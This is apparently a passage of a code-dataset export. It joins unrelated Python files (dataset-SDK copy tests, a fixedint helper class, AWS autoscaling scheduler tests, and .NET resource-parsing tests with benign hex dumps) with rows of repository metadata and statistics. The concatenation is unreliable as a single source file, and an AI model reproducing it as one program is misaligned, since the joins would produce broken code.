    dataset._catalog = Catalog.loads(CATALOG)
    workdir = tmp_path / "sub"
    workdir.mkdir()

    def fill(segment, indices):
        # Create one labelled local file per index and append it to the segment.
        for i in indices:
            file_path = workdir / f"hello{i}.txt"
            file_path.write_text("CONTENT")
            item = Data(local_path=str(file_path))
            item.label = Label.loads(LABEL)
            segment.append(item)

    fill(source, range(10))
    target = dataset.create_segment("Segment2")
    fill(target, range(10, 20))
    dataset_client = client.upload_dataset(dataset)

    dataset_client.copy_segment("Segment1", "Segment2", strategy="skip")

    # With "skip", "Segment2" still holds its own files (hello10..hello19).
    kept = Segment("Segment2", client=dataset_client)
    assert kept[0].path == "hello10.txt"
    assert kept[0].path == target[0].target_remote_path
    assert kept[0].label
    client.delete_dataset(name)
def test_copy_segment_between_datasets(self, accesskey, url, tmp_path):
    """A segment can be copied into a different dataset via ``source_client``."""
    client = GAS(access_key=accesskey, url=url)
    first_name = get_dataset_name()
    client.create_dataset(first_name)
    first = Dataset(name=first_name)
    source = first.create_segment("Segment1")
    first._catalog = Catalog.loads(CATALOG)
    workdir = tmp_path / "sub"
    workdir.mkdir()
    # Populate the source segment with ten labelled files.
    for i in range(10):
        file_path = workdir / f"hello{i}.txt"
        file_path.write_text("CONTENT")
        item = Data(local_path=str(file_path))
        item.label = Label.loads(LABEL)
        source.append(item)
    first_client = client.upload_dataset(first)

    # The second dataset starts empty; the copy pulls "Segment1" across datasets.
    second_name = first_name + "_2"
    second_client = client.create_dataset(second_name)
    second_client.create_draft("draft_2")
    segment_client = second_client.copy_segment(
        "Segment1", "Segment2", source_client=first_client
    )
    assert segment_client.name == "Segment2"

    copied = Segment("Segment2", client=second_client)
    assert copied[0].path == "hello0.txt"
    assert copied[0].path == source[0].target_remote_path
    assert copied[0].label
    client.delete_dataset(first_name)
    client.delete_dataset(second_name)
def test_copy_segment_from_commits(self, accesskey, url, tmp_path):
    """Copy a segment from an earlier commit via a checked-out source client.

    Uploads ten files and commits, uploads ten more and commits again, then
    copies "Segment1" as it was at the older commit into "Segment2" of a new
    draft and checks that only the first ten files arrive.
    """
    gas_client = GAS(access_key=accesskey, url=url)
    dataset_name = get_dataset_name()
    gas_client.create_dataset(dataset_name)
    dataset = Dataset(name=dataset_name)
    segment = dataset.create_segment("Segment1")
    dataset._catalog = Catalog.loads(CATALOG)
    path = tmp_path / "sub"
    path.mkdir()
    # First batch (hello0..hello9), committed as "commit_1".
    for i in range(10):
        local_path = path / f"hello{i}.txt"
        local_path.write_text("CONTENT")
        data = Data(local_path=str(local_path))
        data.label = Label.loads(LABEL)
        segment.append(data)
    dataset_client = gas_client.upload_dataset(dataset)
    dataset_client.commit("commit_1")
    # Second batch (hello10..hello19), committed as "commit_2".
    for i in range(10, 20):
        local_path = path / f"hello{i}.txt"
        local_path.write_text("CONTENT")
        data = Data(local_path=str(local_path))
        data.label = Label.loads(LABEL)
        segment.append(data)
    dataset_client = gas_client.upload_dataset(dataset)
    dataset_client.commit("commit_2")
    # A second client checked out at list_commits()[-1] serves as the copy
    # source — presumably the earliest commit (the final length check expects
    # 10 files); confirm list_commits ordering against the SDK.
    dataset_client_1 = gas_client.get_dataset(dataset_name)
    commit_id = dataset_client_1.list_commits()[-1].commit_id
    dataset_client_1.checkout(revision=commit_id)
    dataset_client.create_draft("draft_3")
    segment_client = dataset_client.copy_segment(
        "Segment1", "Segment2", source_client=dataset_client_1
    )
    assert segment_client.name == "Segment2"
    segment2 = Segment("Segment2", client=dataset_client)
    assert segment2[0].path == "hello0.txt"
    assert segment2[0].path == segment[0].target_remote_path
    assert segment2[0].label
    # Only the first batch existed at the checked-out commit.
    assert len(segment2) == 10
    gas_client.delete_dataset(dataset_name)
def test_copy_data(self, accesskey, url, tmp_path):
    """Data can be copied inside one segment; an unknown strategy is rejected."""
    client = GAS(access_key=accesskey, url=url)
    name = get_dataset_name()
    client.create_dataset(name)
    dataset = Dataset(name=name)
    source = dataset.create_segment("Segment1")
    dataset._catalog = Catalog.loads(CATALOG)
    workdir = tmp_path / "sub"
    workdir.mkdir()
    # Populate the segment with ten labelled files.
    for i in range(10):
        file_path = workdir / f"hello{i}.txt"
        file_path.write_text("CONTENT")
        item = Data(local_path=str(file_path))
        item.label = Label.loads(LABEL)
        source.append(item)
    dataset_client = client.upload_dataset(dataset)
    segment_client = dataset_client.get_segment("Segment1")

    segment_client.copy_data("hello0.txt", "goodbye0.txt")
    segment_client.copy_data("hello1.txt", "hello10.txt")
    # "push" is not a valid copy strategy, so the request must be rejected.
    with pytest.raises(InvalidParamsError):
        segment_client.copy_data("hello2.txt", "see_you.txt", strategy="push")

    contents = Segment("Segment1", client=dataset_client)
    # NOTE(review): the index positions suggest entries are ordered by remote
    # path ("goodbye0" first, "hello10" between "hello1" and "hello2").
    assert contents[0].path == "goodbye0.txt"
    assert contents[3].path == "hello10.txt"
    assert contents[1].label
    client.delete_dataset(name)
def test_copy_data_between_datasets(self, accesskey, url, tmp_path):
    """Copy a single data file across datasets via ``source_client``."""
    gas_client = GAS(access_key=accesskey, url=url)
    dataset_name_1 = get_dataset_name()
    gas_client.create_dataset(dataset_name_1)
    dataset_1 = Dataset(name=dataset_name_1)
    segment_1 = dataset_1.create_segment("Segment1")
    dataset_1._catalog = Catalog.loads(CATALOG)
    path = tmp_path / "sub"
    path.mkdir()
    # Populate the source segment with ten labelled files.
    for i in range(10):
        local_path = path / f"hello{i}.txt"
        local_path.write_text("CONTENT")
        data = Data(local_path=str(local_path))
        data.label = Label.loads(LABEL)
        segment_1.append(data)
    dataset_client_1 = gas_client.upload_dataset(dataset_1)
    # Commit the uploaded data before using it as a copy source.
    dataset_client_1.commit("upload data")
    segment_client_1 = dataset_client_1.get_segment("Segment1")
    # Destination dataset: a fresh draft with an empty "Segment1".
    dataset_name_2 = dataset_name_1 + "_2"
    dataset_client_2 = gas_client.create_dataset(dataset_name_2)
    dataset_client_2.create_draft("draft_2")
    dataset_client_2.create_segment("Segment1")
    segment_client_2 = dataset_client_2.get_segment("Segment1")
    # Copy "hello0.txt" across, keeping the same remote path.
    segment_client_2.copy_data("hello0.txt", "hello0.txt", source_client=segment_client_1)
    segment2 = Segment("Segment1", client=dataset_client_2)
    assert segment2[0].path == "hello0.txt"
    assert segment2[0].label
    gas_client.delete_dataset(dataset_name_1)
    gas_client.delete_dataset(dataset_name_2)
def test_copy_data_from_commits(self, accesskey, url, tmp_path):
    """Copy one data file from an earlier commit into the current draft."""
    gas_client = GAS(access_key=accesskey, url=url)
    dataset_name = get_dataset_name()
    gas_client.create_dataset(dataset_name)
    dataset = Dataset(name=dataset_name)
    segment = dataset.create_segment("Segment1")
    dataset._catalog = Catalog.loads(CATALOG)
    path = tmp_path / "sub"
    path.mkdir()
    # First batch (hello0..hello9), committed as "commit_1".
    for i in range(10):
        local_path = path / f"hello{i}.txt"
        local_path.write_text("CONTENT")
        data = Data(local_path=str(local_path))
        data.label = Label.loads(LABEL)
        segment.append(data)
    dataset_client = gas_client.upload_dataset(dataset)
    dataset_client.commit("commit_1")
    # Second batch (hello10..hello19), committed as "commit_2".
    for i in range(10, 20):
        local_path = path / f"hello{i}.txt"
        local_path.write_text("CONTENT")
        data = Data(local_path=str(local_path))
        data.label = Label.loads(LABEL)
        segment.append(data)
    dataset_client = gas_client.upload_dataset(dataset)
    dataset_client.commit("commit_2")
    # Second client checked out at list_commits()[-1] — presumably the
    # earliest commit; confirm list_commits ordering against the SDK.
    dataset_client_1 = gas_client.get_dataset(dataset_name)
    commit_id = dataset_client_1.list_commits()[-1].commit_id
    dataset_client_1.checkout(revision=commit_id)
    dataset_client.create_draft("draft_3")
    segment_client_1 = dataset_client_1.get_segment("Segment1")
    segment_client_2 = dataset_client.get_segment("Segment1")
    # Copy hello0.txt (as of the checked-out commit) under a new remote path.
    segment_client_2.copy_data("hello0.txt", "goodbye0.txt", source_client=segment_client_1)
    segment2 = Segment("Segment1", client=dataset_client)
    assert segment2[0].path == "goodbye0.txt"
    assert segment2[0].path != segment[0].target_remote_path
    assert segment2[0].label
    # 20 original files plus the one copied-in "goodbye0.txt".
    assert len(segment2) == 21
    gas_client.delete_dataset(dataset_name)
| 39.771117
| 99
| 0.629556
| 3,504
| 29,192
| 4.984589
| 0.050799
| 0.077465
| 0.060804
| 0.040078
| 0.93599
| 0.932497
| 0.91744
| 0.891045
| 0.888641
| 0.876503
| 0
| 0.026854
| 0.255036
| 29,192
| 733
| 100
| 39.825375
| 0.776291
| 0.006474
| 0
| 0.78871
| 0
| 0
| 0.084698
| 0
| 0
| 0
| 0
| 0
| 0.098387
| 1
| 0.030645
| false
| 0
| 0.01129
| 0
| 0.045161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b15046ebae643ff4ac7f0382df318185641f83ed
| 688
|
py
|
Python
|
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | 1
|
2020-07-03T07:33:00.000Z
|
2020-07-03T07:33:00.000Z
|
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | null | null | null |
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
class fixedint(object):
    """Mutable integer wrapper with chainable in-place arithmetic.

    Every operand is truncated to ``int`` before use, so the internal state
    is always an integer. The arithmetic methods mutate ``self`` and return
    it, allowing chains such as ``fixedint(10).add(5).mul(2)``.
    """

    def __init__(self, num):
        # Truncate any numeric input so self.num is always an int.
        self.num = int(num)

    def __repr__(self):
        return str(self.num)

    def __str__(self):
        return str(self.num)

    def __int__(self):
        return int(self.num)

    def __float__(self):
        # BUG FIX: __float__ must return a float; the original returned
        # int(self.num), which makes float(fixedint(...)) raise TypeError
        # ("__float__ returned non-float") on Python 3.
        return float(self.num)

    def add(self, num):
        """Add ``num`` (truncated to int) in place and return self."""
        self.num = int(self.num) + int(num)
        return self

    def sub(self, num):
        """Subtract ``num`` (truncated to int) in place and return self."""
        self.num = int(self.num) - int(num)
        return self

    def mul(self, num):
        """Multiply by ``num`` (truncated to int) in place and return self."""
        self.num = int(self.num) * int(num)
        return self

    def div(self, num):
        """Floor-divide by ``num`` (truncated to int) in place and return self."""
        self.num = int(self.num) // int(num)
        return self
| 26.461538
| 49
| 0.555233
| 98
| 688
| 3.693878
| 0.193878
| 0.348066
| 0.248619
| 0.19337
| 0.801105
| 0.754144
| 0.5
| 0.5
| 0.5
| 0.5
| 0
| 0.002088
| 0.303779
| 688
| 26
| 50
| 26.461538
| 0.753653
| 0.024709
| 0
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.391304
| false
| 0
| 0
| 0.173913
| 0.782609
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b15f8f6aa4341b1bba483e5d1e9c69528d9b22cf
| 3,589
|
py
|
Python
|
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the autoscaling group scheduler."""
import boto3
import time
from random import randint
from package.scheduler.autoscaling_handler import AutoscalingScheduler
from package.scheduler.cloudwatch_handler import CloudWatchAlarmScheduler
from .fixture import launch_asg
import pytest
@pytest.mark.parametrize(
    "aws_region, asg_tag, scheduler_tag, result_count",
    [
        # Matching tags: the scheduler stops the ASG (10 suspended processes).
        (
            "eu-west-1",
            [{"Key": "tostop-asg-test-1", "Values": ["true"]}],
            [{"Key": "tostop-asg-test-1", "Values": ["true"]}],
            10,
        ),
        # Non-matching tags: the ASG is left alone (0 suspended processes).
        (
            "eu-west-1",
            [{"Key": "badtagkey", "Values": ["badtagvalue"]}],
            [{"Key": "tostop-asg-test-2", "Values": ["true"]}],
            0,
        ),
    ],
)
def test_stop_asg_scheduler(aws_region, asg_tag, scheduler_tag, result_count):
    """Verify stop asg scheduler class method.

    Launches an ASG tagged with ``asg_tag``, runs AutoscalingScheduler.stop
    filtered by ``scheduler_tag``, and asserts the number of suspended
    scaling processes equals ``result_count``.
    """
    client = boto3.client("autoscaling", region_name=aws_region)
    # Randomised names avoid collisions between concurrent test runs.
    launch_conf_name = "lc-test" + str(randint(0, 1000000000))
    asg_name = "asg-test" + str(randint(0, 1000000000))
    tag_key = asg_tag[0]["Key"]
    tag_value = "".join(asg_tag[0]["Values"])
    launch_asg(aws_region, tag_key, tag_value, launch_conf_name, asg_name)
    try:
        asg_scheduler = AutoscalingScheduler(aws_region)
        asg_scheduler.cloudwatch_alarm = CloudWatchAlarmScheduler(aws_region)
        asg_scheduler.stop(scheduler_tag)
        # Read back the ASG's suspended processes to see what stop() did.
        suspend_process = client.describe_auto_scaling_groups(
            AutoScalingGroupNames=[asg_name]
        )["AutoScalingGroups"][0]["SuspendedProcesses"]
        assert len([x["ProcessName"] for x in suspend_process]) == result_count
    finally:
        # Clean aws account
        client.delete_auto_scaling_group(
            AutoScalingGroupName=asg_name, ForceDelete=True
        )
        client.delete_launch_configuration(LaunchConfigurationName=launch_conf_name)
@pytest.mark.parametrize(
    "aws_region, asg_tag, scheduler_tag, result_count",
    [
        # Matching tags: the scheduler resumes the ASG (0 suspended processes).
        (
            "eu-west-1",
            [{"Key": "tostop-asg-test-3", "Values": ["true"]}],
            [{"Key": "tostop-asg-test-3", "Values": ["true"]}],
            0,
        ),
        # Non-matching tags: the ASG stays suspended (10 suspended processes).
        (
            "eu-west-1",
            [{"Key": "badtagkey", "Values": ["badtagvalue"]}],
            [{"Key": "tostop-asg-test-4", "Values": ["true"]}],
            10,
        ),
    ],
)
def test_start_asg_scheduler(aws_region, asg_tag, scheduler_tag, result_count):
    """Verify start asg scheduler class method.

    Launches an ASG tagged with ``asg_tag``, suspends all of its processes,
    runs AutoscalingScheduler.start filtered by ``scheduler_tag``, and
    asserts the number of processes still suspended equals ``result_count``.
    """
    client = boto3.client("autoscaling", region_name=aws_region)
    # Randomised names avoid collisions between concurrent test runs.
    launch_conf_name = "lc-test" + str(randint(0, 1000000000))
    asg_name = "asg-test" + str(randint(0, 1000000000))
    tag_key = asg_tag[0]["Key"]
    tag_value = "".join(asg_tag[0]["Values"])
    launch_asg(aws_region, tag_key, tag_value, launch_conf_name, asg_name)
    try:
        # Suspend everything first so start() has something to resume.
        client.suspend_processes(AutoScalingGroupName=asg_name)
        asg_scheduler = AutoscalingScheduler(aws_region)
        asg_scheduler.cloudwatch_alarm = CloudWatchAlarmScheduler(aws_region)
        asg_scheduler.start(scheduler_tag)
        # Read back the ASG's suspended processes to see what start() did.
        suspend_process = client.describe_auto_scaling_groups(
            AutoScalingGroupNames=[asg_name]
        )["AutoScalingGroups"][0]["SuspendedProcesses"]
        assert len([x["ProcessName"] for x in suspend_process]) == result_count
    finally:
        # Clean aws account
        client.delete_auto_scaling_group(
            AutoScalingGroupName=asg_name, ForceDelete=True
        )
        client.delete_launch_configuration(LaunchConfigurationName=launch_conf_name)
| 35.89
| 84
| 0.641962
| 397
| 3,589
| 5.544081
| 0.206549
| 0.049069
| 0.043617
| 0.043617
| 0.833258
| 0.833258
| 0.833258
| 0.798728
| 0.798728
| 0.798728
| 0
| 0.024838
| 0.225968
| 3,589
| 99
| 85
| 36.252525
| 0.767459
| 0.044581
| 0
| 0.707317
| 0
| 0
| 0.15592
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.02439
| false
| 0
| 0.085366
| 0
| 0.109756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b17c24f40d0750899d95c0e3c3aed81f537b413b
| 42,455
|
py
|
Python
|
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | 1
|
2022-02-13T20:57:15.000Z
|
2022-02-13T20:57:15.000Z
|
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.lib.dotnet.deserialize import BinaryFormatterParser, unpack
from refinery.lib.dotnet.resources import NetManifestResource, StreamReader
from refinery.lib.dotnet.types import StringGUID
from .. import TestBase
class TestDotNetParser(TestBase):
def test_parse_binary_formatted_resource(self):
    """Parse a BinaryFormatter blob carrying a System.Drawing.Bitmap.

    The hex fixture (ASCII rendering in the trailing comments) serializes a
    Bitmap whose "Data" member is a PNG. The test checks that the unpacked
    member value occurs inside the raw blob and that the blob is almost
    entirely made up of that value (at most 0x100 bytes of framing left).
    """
    resource = bytes.fromhex(
        '0001000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C' # ......................QSystem.Drawing,
        '2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C20507562' # .Version=2.0.0.0,.Culture=neutral,.Pub
        '6C69634B6579546F6B656E3D6230336635663766313164353061336105010000001553797374' # licKeyToken=b03f5f7f11d50a3a......Syst
        '656D2E44726177696E672E4269746D617001000000044461746107020200000009030000000F' # em.Drawing.Bitmap.....Data............
        '03000000980200000289504E470D0A1A0A0000000D4948445200000010000000100806000000' # ..........PNG........IHDR.............
        '1FF3FF610000000467414D410000B18F0BFC6105000000206348524D00007A26000080840000' # ...a....gAMA......a.....cHRM..z&......
        'FA00000080E8000075300000EA6000003A98000017709CBA513C0000022349444154384FA591' # ........u0...`..:....p..Q<...#IDAT8O..
        'DD4B537118C77F17F51F1444DD2C8A52CA5E2108EA2A084190A02E2CA41814BDA9B5EA585944' # .KSq.......D.,.R.^!..*.A...,.......XYD
        '5E7461CA192EF2942FB09367B6B3ADADF9D65E0AABCD2D4B6B68A6C492B963C3A9BD9179BB9E' # ^ta...../..g......^...-Kkh....c....y..
        'EFDA8F4E69DE74F1E1E17C9FEFE739700EDB72C19765ABE0CFB2AD329065FBC5E00EA20C9367' # ...Ni.t...|...9p..r..e.....2.e.......g
        '80F7B8B7D001035144946732997E4CC298CB0C8B1D5842EC29AE099D6C0B8D5B9A1E7F50E8B9' # .......QD.g2.~L......XB.)...l..[...P..
        '42F2C7656D66CE8B0C3B74D09D7780283459DF08DAA7B900F13431FD23A8071976E8A0CB3DB6' # B..emf...;t..w.(4Y.......41.#...v...=.
        'F9FC239077A02E5C416F0A8CA567FD84EF1FF8D141170E5C5660EA629BCE751FEA7E9DBA1B9F' # ..#.w..\Ao...g......A..\V`.b..u..~....
        '9CF5BD4F7DEF5A0C74D08503976D3CDBB98B10CC9DA3B661ED5BBB9E58E28B2B3C3A63F5C526' # ...O}.Z.t....m<........a.[..X..+<:c..&
        '6F7BFB3F8AAEBE899BA05A1D6C8403976D38D371095F1B3396F8EA01AFE29F1D24DD7144B53A' # o{.?......Z.l...m8.q._.3........$.qD.:
        'B537C9A9E5E81D965FEEDD4D54D5788615121FF4BC9D9249ACB7F726457B84F83DCD39C42B6D' # .7......_..MT.x........I...&E{..=.9.+m
        'B1663870595ED943B6FEB4C7E88C8C4B4F86D20A956F51C9727F0190BBFB2624B9674C840397' # .f8pY^.C.......KO....oQ.r.....&$.gL...
        'AD3BE5060585D5C1CAD0C894CD114D4A6A34D9F007915F385F68127594BDD703021CB86CED09' # .;............MJj4...._8_h.u.......l..
        '17677FA9F9D9D5F0C8B4AD6320253BA35A638E264C64D8A1832EF7D89AE34ECED2D5C7D47D3B' # .g.........c.%;.Zc.&Ld........N.....};
        '85F6CBB5EE41CBF37769D9D4F252311CB5DFA86A1D509161870EBADCD31F605466AB8EB4E6AF' # .....A..wi...R1....j.P.a......`Tf.....
        '3C7CCF485C23447C6D4C64D8A1A377F01BFF3EC056945AB32C3FD852B4ACA4B90113CFD8CD3B' # <|.H\#D|mLd...w...>.V.Z.,?.R.........;
        '406FF80F32EC2745AA42D6480BEBEE0000000049454E44AE4260820B' # @o..2.'E.B.H.......IEND.B`..
    )
    # The parser unpacks into four records; "container" carries the Bitmap
    # whose Members.Data is the embedded payload, "blob" the raw bytes.
    header, library, container, blob = BinaryFormatterParser(resource)
    value = unpack(container.Members.Data)
    self.assertIn(value, blob)
    # Stripping the value out must leave at most 0x100 bytes of framing.
    self.assertLessEqual(len(blob.replace(value, B'')), 0x100)
def test_unpack_resource_single_entry(self):
    """Unpack a .NET resource manifest containing exactly one entry.

    The hex fixture (ASCII rendering in the trailing comments) is a
    RuntimeResourceSet holding a single "pipette.Image" bitmap resource;
    the parsed manifest must therefore expose exactly one resource.
    """
    manifest = bytes.fromhex(
        'CECAEFBE01000000910000006C53797374656D2E5265736F75726365732E5265736F75726365' # ............lSystem.Resources.Resource
        '5265616465722C206D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C' # Reader,.mscorlib,.Version=2.0.0.0,.Cul
        '747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623737613563353631' # ture=neutral,.PublicKeyToken=b77a5c561
        '393334653038392353797374656D2E5265736F75726365732E52756E74696D655265736F7572' # 934e089#System.Resources.RuntimeResour
        '63655365740200000001000000010000006853797374656D2E44726177696E672E4269746D61' # ceSet............hSystem.Drawing.Bitma
        '702C2053797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C204375' # p,.System.Drawing,.Version=2.0.0.0,.Cu
        '6C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6230336635663766' # lture=neutral,.PublicKeyToken=b03f5f7f
        '3131643530613361504144504144658721C100000000430100001A7000690070006500740074' # 11d50a3aPADPADe.!.....C....p.i.p.e.t.t
        '0065002E0049006D0061006700650000000000400001000000FFFFFFFF01000000000000000C' # .e...I.m.a.g.e.....@..................
        '020000005153797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C20' # ....QSystem.Drawing,.Version=2.0.0.0,.
        '43756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566' # Culture=neutral,.PublicKeyToken=b03f5f
        '3766313164353061336105010000001553797374656D2E44726177696E672E4269746D617001' # 7f11d50a3a......System.Drawing.Bitmap.
        '000000044461746107020200000009030000000F03000000020200000289504E470D0A1A0A00' # ....Data......................PNG.....
        '00000D49484452000000100000001008060000001FF3FF610000000467414D410000B18F0BFC' # ...IHDR................a....gAMA......
        '61050000001974455874536F6674776172650041646F626520496D616765526561647971C965' # a.....tEXtSoftware.Adobe.ImageReadyq.e
        '3C0000019449444154384FA5923D4B42511880DF83222A8A3A08A238E475137F40D007067ED0' # <....IDAT8O..=KBQ...."*.:..8.u..@...~.
        'E2222E5EC3B8680D35DA90E0EEA05C903E694A2B41222A285AB2202842285A5CAC500882A068' # .".^..h.5.....\.>iJ+A"*(Z..(B(Z\.P...h
        '6B104EEF95EEE596578C1A9E7338709EE7BCC3014AE9BFE82E6AB51A469127427A68238F5F3C' # k.N.....W...s8p.....J....j..F.'Bzh#._<
        '1032D62064BF4EC8518D9009299056A91465013120CA1D9EA7AFE9343D003897024AA2881090' # .2..d.N.Q...).V..e.1.......4=.8..J....
        'CBAD7098DE47A37413E072506004A9B60899559257018252A006D0C329409D562AB449C89E92' # ..p..G.t..rP`.....U.W..R....)@.V*.I...
        'BC8C77A440C9EF87AD6010B64321897220C01E63A4532C2ACADF02B95C0EF2F93CF03CDFA550' # ..w.@....`..C!.r...c.S,*....\...<.<..P
        '28B8B3D96C6AA17C97D9C5483312A1EB00D72B008BA2DC3720CA2FEF1F8D9D8BF6A1102961E4' # (...lj.|...H3.....+....7../........)a.
        '0D2758C21D01919EC04FF9E4F679C3EBF5A6A6CC66162710E450DF00C2643299A45CF6783C49' # .'X......O...y......f.'..P...d2..\.x<I
        'A7D3E98E198DB026137B022CCB02C77109B9CC304CC266B33176BB1D06067C3E9F2B363D3327' # .......&.{.,...q...0L.f.1v....|>.+6=3'
        'CA28B2168BC565B55AE1570187C311175E1F1EF7CF1B0C86B85EAF1F32994CD02F50C28F5645' # .(....e.Z.W.....^........^..2.L./P..VE
        'A4804EA79BD468341CC268B55AE10C4A810A4A57C80D72260FFC1D0A9FB590AA7EEAB5651300' # ..N...h4..h.Z..J..JW..r&........~..e..
        '00000049454E44AE4260820B' # ...IEND.B`..
    )
    parsed = NetManifestResource(StreamReader(manifest))
    self.assertEqual(len(parsed.Resources), 1)
def test_unpack_resource_multiple_entries(self):
    """A .NET .resources stream holding eleven bitmaps yields 11 Resources.

    The payload is a genuine ``System.Resources.ResourceReader`` binary
    stream (magic ``CE CA EF BE`` = 0xBEEFCACE little-endian, visible at the
    start of the dump).  Its name table lists eleven ``contextmenu_*.Image``
    entries, each followed by a BinaryFormatter-serialized
    ``System.Drawing.Bitmap`` wrapping a 16x16 PNG.  The parser under test
    must enumerate all eleven entries.
    """
    # Raw hex dump of the resource stream; the trailing comments show an
    # ASCII rendering of each 38-byte row for readability.
    manifest = bytes.fromhex(
        'CECAEFBE01000000910000006C53797374656D2E5265736F75726365732E5265736F75726365' # ............lSystem.Resources.Resource
        '5265616465722C206D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C' # Reader,.mscorlib,.Version=2.0.0.0,.Cul
        '747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623737613563353631' # ture=neutral,.PublicKeyToken=b77a5c561
        '393334653038392353797374656D2E5265736F75726365732E52756E74696D655265736F7572' # 934e089#System.Resources.RuntimeResour
        '6365536574020000000B000000010000006853797374656D2E44726177696E672E4269746D61' # ceSet............hSystem.Drawing.Bitma
        '702C2053797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C204375' # p,.System.Drawing,.Version=2.0.0.0,.Cu
        '6C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6230336635663766' # lture=neutral,.PublicKeyToken=b03f5f7f
        '3131643530613361504144504144DF48D9870AD3D997445FB5FE149ACE239739B935A95BF838' # 11d50a3aPADPAD.H......D_.....#.9.5.[.8
        '575A6D550C04985BCE56C3687AC5B96B4D8D3D7A960100006101000088000000310200001E01' # WZmU...[.V.hz..kM.=z....a.......1.....
        '0000D30000003F00000000000000C701000068020000F8010000150400003A63006F006E0074' # ......?...........h...........:c.o.n.t
        '006500780074006D0065006E0075005F00630061007000740075007200650061007200650061' # .e.x.t.m.e.n.u._.c.a.p.t.u.r.e.a.r.e.a
        '002E0049006D00610067006500000000004463006F006E0074006500780074006D0065006E00' # ...I.m.a.g.e.....Dc.o.n.t.e.x.t.m.e.n.
        '75005F00630061007000740075007200650063006C006900700062006F006100720064002E00' # u._.c.a.p.t.u.r.e.c.l.i.p.b.o.a.r.d...
        '49006D00610067006500B30100004663006F006E0074006500780074006D0065006E0075005F' # I.m.a.g.e.....Fc.o.n.t.e.x.t.m.e.n.u._
        '006300610070007400750072006500660075006C006C00730063007200650065006E002E0049' # .c.a.p.t.u.r.e.f.u.l.l.s.c.r.e.e.n...I
        '006D00610067006500520500004663006F006E0074006500780074006D0065006E0075005F00' # .m.a.g.e.R...Fc.o.n.t.e.x.t.m.e.n.u._.
        '63006100700074007500720065006C0061007300740072006500670069006F006E002E004900' # c.a.p.t.u.r.e.l.a.s.t.r.e.g.i.o.n...I.
        '6D006100670065006F0800003E63006F006E0074006500780074006D0065006E0075005F0063' # m.a.g.e.o...>c.o.n.t.e.x.t.m.e.n.u._.c
        '00610070007400750072006500770069006E0064006F0077002E0049006D0061006700650079' # .a.p.t.u.r.e.w.i.n.d.o.w...I.m.a.g.e.y
        '0B00003063006F006E0074006500780074006D0065006E0075005F0064006F006E0061007400' # ...0c.o.n.t.e.x.t.m.e.n.u._.d.o.n.a.t.
        '65002E0049006D006100670065009C0E00002C63006F006E0074006500780074006D0065006E' # e...I.m.a.g.e.....,c.o.n.t.e.x.t.m.e.n
        '0075005F0065007800690074002E0049006D00610067006500161200002C63006F006E007400' # .u._.e.x.i.t...I.m.a.g.e.....,c.o.n.t.
        '6500780074006D0065006E0075005F00680065006C0070002E0049006D006100670065006414' # e.x.t.m.e.n.u._.h.e.l.p...I.m.a.g.e.d.
        '00003463006F006E0074006500780074006D0065006E0075005F006F00700065006E00660069' # ..4c.o.n.t.e.x.t.m.e.n.u._.o.p.e.n.f.i
        '006C0065002E0049006D00610067006500CC1700003263006F006E0074006500780074006D00' # .l.e...I.m.a.g.e.....2c.o.n.t.e.x.t.m.
